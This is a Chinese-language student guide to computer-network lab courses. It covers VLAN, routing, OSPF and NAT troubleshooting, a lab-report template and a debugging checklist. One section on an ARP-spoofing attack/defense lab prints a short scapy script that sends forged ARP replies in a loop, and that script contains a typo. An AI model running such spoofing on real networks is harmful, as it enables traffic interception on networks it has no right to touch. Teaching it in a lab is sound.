文章目录
实验环境准备篇
搞实验最怕的就是环境翻车(别问我怎么知道的)!推荐两种靠谱方案:
- 物理设备流:去实验室抢3台华为AR1220路由器+2台S5720交换机(记得带零食贿赂管理员)
- 虚拟玩家流:VMware Workstation + GNS3模拟器(亲测16G内存电脑能跑5节点拓扑)
装系统时必装的四大金刚:
- Wireshark(抓包神器)
- Putty(串口调试必备)
- SecureCRT(多窗口管理超方便)
- TFTP服务器软件(配置文件备份用)
实验必杀技TOP5
1. 网线直连的玄学
当两台设备死活ping不通时:
- 检查网线是否是交叉线(现代设备大多支持自动翻转了)
arp -a
命令看有没有缓存脏数据- 关掉Windows防火墙(这个坑我踩过三次!)
2. VLAN划分暗黑技巧
配置完VLAN记得这三步:
switchport trunk allowed vlan add 10,20 # 追加VLAN别用等号!
spanning-tree portfast trunk # 防止STP阻塞
show vlan brief | include active # 只看生效的VLAN
3. 静态路由的死亡三角
当三个路由器组成环时:
- 永远记得写默认路由指向null0接口
- 路由优先级要比动态路由低
- 用
debug ip packet
看数据包死在哪了
4. OSPF的相爱相杀
区域划分的三大禁忌:
- 骨干区域没有直连(area0必须连通!)
- 网络类型不匹配(广播网络配成点对点)
- 认证密钥不一致(建议复制粘贴)
5. NAT地址转换翻车现场
端口映射失败的终极检查清单:
- 内网主机网关指向NAT设备了吗?
- ACL有没有放行外部地址?
ip nat translation
表项是否存在?- 外部接口是不是配了overload?
协议分析实战
ARP欺骗攻防实验
(超好玩!但别在校园网乱搞)
步骤分解:
- 用Wireshark抓取正常ARP包
- 自己构造恶意ARP响应包
- 观察目标机的ARP缓存变化
- 使用
arp -s
绑定静态条目防御
# 简易版ARP欺骗脚本
from scapy.all import *
def arp_spoof(target_ip, gateway_ip):
target_mac = getmacbyip(target_ip)
packet = ARK(op=2, pdst=target_ip,
hwdst=target_mac,
psrc=gateway_ip)
send(packet, inter=0.5, loop=1)
实验报告救命模板
被实验报告折磨的同学们看这里!
# 实验三:VLAN间路由
## 一、拓扑图
![此处手绘扫描图更接地气]
## 二、关键配置
```cisco
interface GigabitEthernet0/0/1
switchport mode trunk
switchport trunk native vlan 99 # 管理VLAN
三、现象分析
原理解读→配置过程→故障现象→排查思路→最终解决
(配图:Wireshark抓包截图要用红色框标重点)
四、灵魂三问
- 为什么TRUNK口要设置native VLAN?
- 不同厂商设备VLAN互通要注意什么?
- 如果主机收到多个VLAN标签会如何处理?
## 实验排错工具箱
当一切都不work时,按这个顺序排查:
1. **物理层**:网线/接口状态/速率双工模式
2. **数据链路层**:MAC地址表/VLAN标签
3. **网络层**:路由表/ACL规则/NAT转换表
4. **传输层**:端口监听状态/防火墙规则
5. **应用层**:DNS解析/服务进程状态
推荐用这个万能命令链:
`show running-config | include 关键配置 → traceroute → telnet测试端口 → 协议debug模式`
## 实验老司机的忠告
- 每次改配置前先`copy running-config startup-config`
- 复杂实验要用`reload in 10`设置自动回滚
- Wireshark过滤器语法要提前练熟(`tcp.port==80 && http`)
- 遇到玄学问题先重启设备(虽然很low但管用)
- 实验报告要边做边写(别问我怎么知道的)
最后送大家一句话:实验虐我千百遍,我待实验如初恋。搞懂这些套路,期末实验绝对稳了!下次可能会出《计算机网络实验高阶骚操作篇》,想看的同学评论区敲个1~ (笑)